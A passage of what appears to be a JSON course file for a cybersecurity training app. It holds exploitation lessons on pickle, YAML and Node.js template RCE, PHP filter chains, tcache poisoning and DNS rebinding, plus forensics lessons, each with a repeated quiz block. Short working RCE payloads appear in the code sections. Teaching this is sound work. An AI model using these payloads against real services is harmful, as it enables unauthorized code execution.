target_address;\nmalloc(size);  // returns chunk\nmalloc(size);  // returns target_address!\n// Now write controlled data at target"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Tcache poisoning works because...","opts":["Tcache uses encryption","Tcache has no integrity checks on the free list (pre-2.32)","Tcache is in kernel space","Tcache uses ASLR"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1},{"type":"quiz","q":"Fuzzing sends...","opts":["Valid input","Random/mutated input to find crashes","Network packets","Encryption keys"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection","Position Independent Executable","Protocol Interface","Packet Inspection"],"ans":1},{"type":"quiz","q":"ROP gadget ends with...","opts":["jmp","call","nop","ret"],"ans":3},{"type":"quiz","q":"pwntools is for...","opts":["Web scraping","Binary exploitation","Machine learning","Database"],"ans":1},{"type":"quiz","q":"GDB is for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Expert","Centralized Evaluator"],"ans":0},{"type":"quiz","q":"Web shell provides...","opts":["DDoS","Persistent command execution via HTTP","Email access","DNS control"],"ans":1},{"type":"quiz","q":"Bind shell listens on...","opts":["Attacker's machine","Target machine","Relay server","Random port"],"ans":1},{"type":"quiz","q":"msfvenom generates...","opts":["Wordlists","Metasploit payloads","Network maps","Encryption keys"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Code execution on stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Shellcode must be...","opts":["Compiled","Position-independent","Encrypted","Signed"],"ans":1},{"type":"quiz","q":"Format string %n does...","opts":["Prints number","Writes to memory","Prints newline","Prints nothing"],"ans":1},{"type":"quiz","q":"Heap overflow corrupts...","opts":["Stack","Malloc chunk metadata","Page tables","TLS"],"ans":1},{"type":"quiz","q":"Use-after-free exploits...","opts":["Stack frames","Freed memory reallocated with attacker data","Network","Files"],"ans":1}]},{"id":"ex-php-filter-chain","cat":"Exploitation","title":"PHP Filter Chain RCE","diff":3,"xp":200,"intro":"Chain PHP stream filters to generate arbitrary content from nothing.","sections":[{"type":"text","content":"PHP's convert filters can transform empty input into arbitrary bytes. Chain base64-decode, rot13, and iconv filters to construct PHP code from /dev/null."},{"type":"code","lang":"bash","content":"# PHP filter chain to generate <?=`id`?> from nothing:\nphp://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|...|resource=/dev/null\n# Tool: php_filter_chain_generator.py\npython3 php_filter_chain_generator.py --chain '<?=`id`?>'"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"PHP filter chains generate content by...","opts":["Reading files","Chaining encoding/decoding filters to construct arbitrary bytes","Exploiting buffer overflows","Using SQL injection"],"ans":1},{"type":"quiz","q":"Integer overflow causes...","opts":["Division by zero","Value exceeding type's max wraps around","Null pointer","Memory leak"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1},{"type":"quiz","q":"Fuzzing sends...","opts":["Valid input","Random/mutated input to find crashes","Network packets","Encryption keys"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection","Position Independent Executable","Protocol Interface","Packet Inspection"],"ans":1},{"type":"quiz","q":"ROP gadget ends with...","opts":["jmp","call","nop","ret"],"ans":3},{"type":"quiz","q":"pwntools is for...","opts":["Web scraping","Binary exploitation","Machine learning","Database"],"ans":1},{"type":"quiz","q":"GDB is for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Expert","Centralized Evaluator"],"ans":0},{"type":"quiz","q":"Web shell provides...","opts":["DDoS","Persistent command execution via HTTP","Email access","DNS control"],"ans":1},{"type":"quiz","q":"Bind shell listens on...","opts":["Attacker's machine","Target machine","Relay server","Random port"],"ans":1},{"type":"quiz","q":"msfvenom generates...","opts":["Wordlists","Metasploit payloads","Network maps","Encryption keys"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Code execution on stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Shellcode must be...","opts":["Compiled","Position-independent","Encrypted","Signed"],"ans":1},{"type":"quiz","q":"Format string %n does...","opts":["Prints number","Writes to memory","Prints newline","Prints nothing"],"ans":1},{"type":"quiz","q":"Heap overflow corrupts...","opts":["Stack","Malloc chunk metadata","Page tables","TLS"],"ans":1}]},{"id":"ex-template-rce","cat":"Exploitation","title":"Template Literal RCE in Node.js","diff":3,"xp":200,"intro":"Exploit template injection in server-side JavaScript.","sections":[{"type":"text","content":"If user input reaches a template literal or eval in Node.js, inject JavaScript for RCE via require('child_process')."},{"type":"code","lang":"javascript","content":"// Vulnerable:\nconst output = eval(`Hello ${userInput}`);\n// Payload:\n${require('child_process').execSync('id')}\n// Or via constructor:\n(function(){return this})().constructor.constructor('return require')()('child_process').execSync('id')"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Node.js template injection allows...","opts":["CSS injection","Remote code execution via require('child_process')","Only XSS","Only file reading"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1},{"type":"quiz","q":"Fuzzing sends...","opts":["Valid input","Random/mutated input to find crashes","Network packets","Encryption keys"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection","Position Independent Executable","Protocol Interface","Packet Inspection"],"ans":1},{"type":"quiz","q":"ROP gadget ends with...","opts":["jmp","call","nop","ret"],"ans":3},{"type":"quiz","q":"pwntools is for...","opts":["Web scraping","Binary exploitation","Machine learning","Database"],"ans":1},{"type":"quiz","q":"GDB is for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Expert","Centralized Evaluator"],"ans":0},{"type":"quiz","q":"Web shell provides...","opts":["DDoS","Persistent command execution via HTTP","Email access","DNS control"],"ans":1},{"type":"quiz","q":"Bind shell listens on...","opts":["Attacker's machine","Target machine","Relay server","Random port"],"ans":1},{"type":"quiz","q":"msfvenom generates...","opts":["Wordlists","Metasploit payloads","Network maps","Encryption keys"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Code execution on stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Shellcode must be...","opts":["Compiled","Position-independent","Encrypted","Signed"],"ans":1},{"type":"quiz","q":"Format string %n does...","opts":["Prints number","Writes to memory","Prints newline","Prints nothing"],"ans":1},{"type":"quiz","q":"Heap overflow corrupts...","opts":["Stack","Malloc chunk metadata","Page tables","TLS"],"ans":1},{"type":"quiz","q":"Use-after-free exploits...","opts":["Stack frames","Freed memory reallocated with attacker data","Network","Files"],"ans":1}]},{"id":"ex-yaml-deserial","cat":"Exploitation","title":"YAML Deserialization RCE","diff":3,"xp":200,"intro":"Unsafe YAML parsing leads to arbitrary code execution.","sections":[{"type":"text","content":"Python's yaml.load() (without SafeLoader) and Ruby's YAML.load() process special tags that instantiate arbitrary objects \u2014 leading to RCE."},{"type":"code","lang":"python","content":"# Python YAML RCE:\nimport yaml\npayload = '!!python/object/apply:os.system [\"id\"]'\nyaml.load(payload)  # executes 'id'!\n# Safe: yaml.safe_load(payload)  # raises error\n# Ruby:\n# --- !ruby/object:Gem::Installer\n# i: x\n# --- !ruby/object:Gem::SpecFetcher\n# i: y"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"yaml.load() is dangerous because...","opts":["It's slow","It processes tags that instantiate arbitrary objects (RCE)","It only reads strings","It requires authentication"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1},{"type":"quiz","q":"Fuzzing sends...","opts":["Valid input","Random/mutated input to find crashes","Network packets","Encryption keys"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection","Position Independent Executable","Protocol Interface","Packet Inspection"],"ans":1},{"type":"quiz","q":"ROP gadget ends with...","opts":["jmp","call","nop","ret"],"ans":3},{"type":"quiz","q":"pwntools is for...","opts":["Web scraping","Binary exploitation","Machine learning","Database"],"ans":1},{"type":"quiz","q":"GDB is for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Expert","Centralized Evaluator"],"ans":0},{"type":"quiz","q":"Web shell provides...","opts":["DDoS","Persistent command execution via HTTP","Email access","DNS control"],"ans":1},{"type":"quiz","q":"Bind shell listens on...","opts":["Attacker's machine","Target machine","Relay server","Random port"],"ans":1},{"type":"quiz","q":"msfvenom generates...","opts":["Wordlists","Metasploit payloads","Network maps","Encryption keys"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Code execution on stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Shellcode must be...","opts":["Compiled","Position-independent","Encrypted","Signed"],"ans":1},{"type":"quiz","q":"Format string %n does...","opts":["Prints number","Writes to memory","Prints newline","Prints nothing"],"ans":1},{"type":"quiz","q":"Heap overflow corrupts...","opts":["Stack","Malloc chunk metadata","Page tables","TLS"],"ans":1},{"type":"quiz","q":"Use-after-free exploits...","opts":["Stack frames","Freed memory reallocated with attacker data","Network","Files"],"ans":1}]},{"id":"ex-pickle-rce","cat":"Exploitation","title":"Python Pickle Deserialization RCE","diff":2,"xp":150,"intro":"Never unpickle untrusted data \u2014 it executes arbitrary code.","sections":[{"type":"text","content":"Python's pickle module can serialize any object, including ones with __reduce__ methods that execute code on deserialization."},{"type":"code","lang":"python","content":"import pickle, os\nclass Exploit:\n    def __reduce__(self):\n        return (os.system, ('id',))\n\npayload = pickle.dumps(Exploit())\npickle.loads(payload)  # executes 'id'"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Pickle is dangerous because __reduce__ allows...","opts":["Compression","Arbitrary code execution during deserialization","Encryption","Type checking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1},{"type":"quiz","q":"Fuzzing sends...","opts":["Valid input","Random/mutated input to find crashes","Network packets","Encryption keys"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection","Position Independent Executable","Protocol Interface","Packet Inspection"],"ans":1},{"type":"quiz","q":"ROP gadget ends with...","opts":["jmp","call","nop","ret"],"ans":3},{"type":"quiz","q":"pwntools is for...","opts":["Web scraping","Binary exploitation","Machine learning","Database"],"ans":1},{"type":"quiz","q":"GDB is for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Expert","Centralized Evaluator"],"ans":0},{"type":"quiz","q":"Web shell provides...","opts":["DDoS","Persistent command execution via HTTP","Email access","DNS control"],"ans":1},{"type":"quiz","q":"Bind shell listens on...","opts":["Attacker's machine","Target machine","Relay server","Random port"],"ans":1},{"type":"quiz","q":"msfvenom generates...","opts":["Wordlists","Metasploit payloads","Network maps","Encryption keys"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Code execution on stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Shellcode must be...","opts":["Compiled","Position-independent","Encrypted","Signed"],"ans":1},{"type":"quiz","q":"Format string %n does...","opts":["Prints number","Writes to memory","Prints newline","Prints nothing"],"ans":1},{"type":"quiz","q":"Heap overflow corrupts...","opts":["Stack","Malloc chunk metadata","Page tables","TLS"],"ans":1},{"type":"quiz","q":"Use-after-free exploits...","opts":["Stack frames","Freed memory reallocated with attacker data","Network","Files"],"ans":1}]},{"id":"ex-dns-rebind","cat":"Exploitation","title":"DNS Rebinding Attack","diff":4,"xp":250,"intro":"Bypass same-origin policy by rebinding DNS records mid-session.","sections":[{"type":"text","content":"Serve your domain resolving to your IP, then quickly change it to 127.0.0.1. The browser's same-origin allows requests to your domain, which now points to localhost."},{"type":"code","lang":"bash","content":"# Attack flow:\n# 1. victim visits attacker.com (resolves to attacker IP)\n# 2. JavaScript loads from attacker.com\n# 3. DNS record changes: attacker.com -> 127.0.0.1\n# 4. Same-origin: JS can now access http://attacker.com:8080\n#    which is actually localhost:8080\n# Tool: singularity (DNS rebinding framework)"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"DNS rebinding bypasses same-origin because...","opts":["It disables SOP","The domain stays the same but the IP changes to the target","It uses encryption","It modifies the hosts file"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1},{"type":"quiz","q":"Fuzzing sends...","opts":["Valid input","Random/mutated input to find crashes","Network packets","Encryption keys"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection","Position Independent Executable","Protocol Interface","Packet Inspection"],"ans":1},{"type":"quiz","q":"ROP gadget ends with...","opts":["jmp","call","nop","ret"],"ans":3},{"type":"quiz","q":"pwntools is for...","opts":["Web scraping","Binary exploitation","Machine learning","Database"],"ans":1},{"type":"quiz","q":"GDB is for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Expert","Centralized Evaluator"],"ans":0},{"type":"quiz","q":"Web shell provides...","opts":["DDoS","Persistent command execution via HTTP","Email access","DNS control"],"ans":1},{"type":"quiz","q":"Bind shell listens on...","opts":["Attacker's machine","Target machine","Relay server","Random port"],"ans":1},{"type":"quiz","q":"msfvenom generates...","opts":["Wordlists","Metasploit payloads","Network maps","Encryption keys"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Code execution on stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Shellcode must be...","opts":["Compiled","Position-independent","Encrypted","Signed"],"ans":1},{"type":"quiz","q":"Format string %n does...","opts":["Prints number","Writes to memory","Prints newline","Prints nothing"],"ans":1},{"type":"quiz","q":"Heap overflow corrupts...","opts":["Stack","Malloc chunk metadata","Page tables","TLS"],"ans":1},{"type":"quiz","q":"Use-after-free exploits...","opts":["Stack frames","Freed memory reallocated with attacker data","Network","Files"],"ans":1}]},{"id":"fo-disk-encryption","cat":"Forensics & IR","title":"Encrypted Disk Forensics","diff":3,"xp":200,"intro":"Dealing with BitLocker, FileVault, and LUKS during investigation.","sections":[{"type":"text","content":"Encrypted disks need keys: BitLocker recovery keys (AD, TPM, or memory), FileVault recovery keys, LUKS passphrases. Memory forensics may contain the key."},{"type":"code","lang":"bash","content":"# BitLocker: check for recovery key in memory\nvol.py -f memory.dmp --profile=Win10x64 bitlocker\n# Or find recovery key in AD\n# LUKS: try known passphrases\ncryptsetup luksOpen /dev/sda2 decrypted\n# FileVault: recovery key or institutional key"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Encrypted disks can sometimes be accessed via...","opts":["Brute force only","Recovery keys found in memory dumps or Active Directory","Bypassing encryption","Deleting the encryption"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1},{"type":"quiz","q":"USN Journal records...","opts":["Logins","File system changes","Network","Processes"],"ans":1},{"type":"quiz","q":"Evidence integrity uses...","opts":["File size","Cryptographic hash comparison","Visual inspection","Name matching"],"ans":1},{"type":"quiz","q":"Sandboxing means...","opts":["Deleting","Running in isolated environment","Encrypting","Reversing"],"ans":1},{"type":"quiz","q":"Containment prevents...","opts":["Detection","Further damage and spread","Analysis","Recovery"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network","Memory dumps","Disk images","Logs"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["Guilt","Evidence wasn't tampered with","Investigation done","Hash matched"],"ans":1},{"type":"quiz","q":"Forensic image is...","opts":["Photo","Bit-for-bit disk copy","Screenshot","Memory dump"],"ans":1},{"type":"quiz","q":"dc3dd improves dd by...","opts":["Speed","Automatic hash calculation","Compression","Smaller output"],"ans":1},{"type":"quiz","q":"malfind detects...","opts":["File changes","Injected code in process memory","Network","Registry"],"ans":1},{"type":"quiz","q":"Log correlation combines...","opts":["Users","Multiple log sources for full picture","Cables","Keys"],"ans":1},{"type":"quiz","q":"Event 1102 means...","opts":["Login","Audit log was cleared","Process created","Service started"],"ans":1},{"type":"quiz","q":"Browser history is in...","opts":["Text files","SQLite databases","Registry","Encrypted blobs"],"ans":1},{"type":"quiz","q":"YARA rules match...","opts":["Network traffic","Pattern signatures in files/memory","DNS queries","Encryption"],"ans":1},{"type":"quiz","q":"Plaso creates a...","opts":["Disk image","Super-timeline of all events","Network capture","Memory dump"],"ans":1}]},{"id":"fo-registry-deep","cat":"Forensics & IR","title":"Windows Registry Deep Forensics","diff":4,"xp":250,"intro":"Extract timestamps, deleted keys, and hidden data from registry hives.","sections":[{"type":"text","content":"Registry hives contain: key last-modified timestamps, deleted keys (recoverable from slack space), values with binary data (malware configs), and MRU lists."},{"type":"code","lang":"bash","content":"# Parse offline hives with RegRipper\nregripper -r NTUSER.DAT -p all\nregripper -r SAM -p samparse\nregripper -r SYSTEM -p services\n# Registry Explorer (GUI) shows deleted keys\n# Key last-write timestamps help build timelines"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Deleted registry keys can be recovered from...","opts":["Nowhere","Slack space in the hive file","The event log","The recycle bin"],"ans":1},{"type":"quiz","q":"Ransomware IR first action?","opts":["Pay","Disconnect (don't power off)","Reinstall","Call police"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1},{"type":"quiz","q":"USN Journal records...","opts":["Logins","File system changes","Network","Processes"],"ans":1},{"type":"quiz","q":"Evidence integrity uses...","opts":["File size","Cryptographic hash comparison","Visual inspection","Name matching"],"ans":1},{"type":"quiz","q":"Sandboxing means...","opts":["Deleting","Running in isolated environment","Encrypting","Reversing"],"ans":1},{"type":"quiz","q":"Containment prevents...","opts":["Detection","Further damage and spread","Analysis","Recovery"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network","Memory dumps","Disk images","Logs"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["Guilt","Evidence wasn't tampered with","Investigation done","Hash matched"],"ans":1},{"type":"quiz","q":"Forensic image is...","opts":["Photo","Bit-for-bit disk copy","Screenshot","Memory dump"],"ans":1},{"type":"quiz","q":"dc3dd improves dd by...","opts":["Speed","Automatic hash calculation","Compression","Smaller output"],"ans":1},{"type":"quiz","q":"malfind detects...","opts":["File changes","Injected code in process memory","Network","Registry"],"ans":1},{"type":"quiz","q":"Log correlation combines...","opts":["Users","Multiple log sources for full picture","Cables","Keys"],"ans":1},{"type":"quiz","q":"Event 1102 means...","opts":["Login","Audit log was cleared","Process created","Service started"],"ans":1},{"type":"quiz","q":"Browser history is in...","opts":["Text files","SQLite databases","Registry","Encrypted 